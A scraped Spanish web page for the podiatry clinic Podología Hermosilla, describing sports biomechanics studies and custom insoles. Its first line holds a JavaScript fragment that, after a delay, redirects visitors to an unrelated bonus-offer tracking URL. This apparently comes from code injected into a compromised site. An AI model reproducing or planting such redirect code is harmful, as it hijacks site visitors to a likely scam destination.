{ window.location.replace('http://cabonusoffer.com/track/'); }, delay);})();et_fullwidth_nav et_fullwidth_secondary_nav et_fixed_nav et_show_nav et_primary_nav_dropdown_animation_slide et_secondary_nav_dropdown_animation_fade et_header_style_split et_pb_footer_columns4 et_cover_background et_pb_gutter et_pb_gutters3 et_pb_pagebuilder_layout et_no_sidebar et_divi_theme et-db et_minified_js et_minified_css">

Biomecánica Deportiva

Biomecánica Deportiva

Biomecánica Deportiva

La biomecánica estudia las diferentes fuerzas que actúan sobre nuestro cuerpo, relacionándolas con las posibles alteraciones presentes en el cuerpo.

Mediante el estudio biomecánico analizamos el cuerpo humano en su conjunto, tanto en estática como en dinámica. Resulta indispensable para establecer las características del paciente y poder llegar a un diagnóstico.

Un correcto estudio biomecánico debe constar de una amplia anamnesis, exploración articular, muscular y tendinosa, análisis estáticos y dinámica de la marcha mediante plataforma de presiones y cámaras de alta velocidad. Utilizamos una plataforma con sensores capacitivos para conocer la distribución de presiones en la planta del pie, tanto en estática como en dinámica.

La finalidad de realizar un buen estudio biomecánico es la de prevenir y tratar las lesiones del aparato locomotor.

Puedes ver aquí nuestros tratamientos para Plantillas Deportivas

 

En Podología Hermosilla fabricamos plantillas de estudio biomecánico.

Estas son personalizadas al detalle para cada paciente, atendiendo a sus medidas y sus necesidades. De esta manera, conseguimos su perfecta adaptación al cuerpo humano tratando de satisfacer todas las necesidades y dolencias que este tenga.

Para comenzar en este proceso se realiza un exhaustivo estudio de la planta del pie o estudio biomecánico

para conocer todas las características del mismo y determinar cuál puede ser su tratamiento necesario. Estas están compuestas por materiales blandos para facilitar la comodidad del paciente y mejorar la calidad de su día a día.

Estas también están pensadas para deportistas. Nuestro servicio de biomecánica deportiva se centra en conocer las respuestas que tiene el cuerpo humano ante cada movimiento y entender cómo reacciona. Gracias a ello se puede determinar cómo es la pisada de cada paciente y poder corregirla mediante un estudio de la planta del pie.

¿Crees que en tu caso necesitas disponer de plantillas con estudio biomecánico?

Contacta con nuestros especialistas y solicita una visita a nuestra clínica. Te atenderemos y asesoraremos en cualquier momento para que conozcas las necesidades de tu pie y todas las soluciones que existen.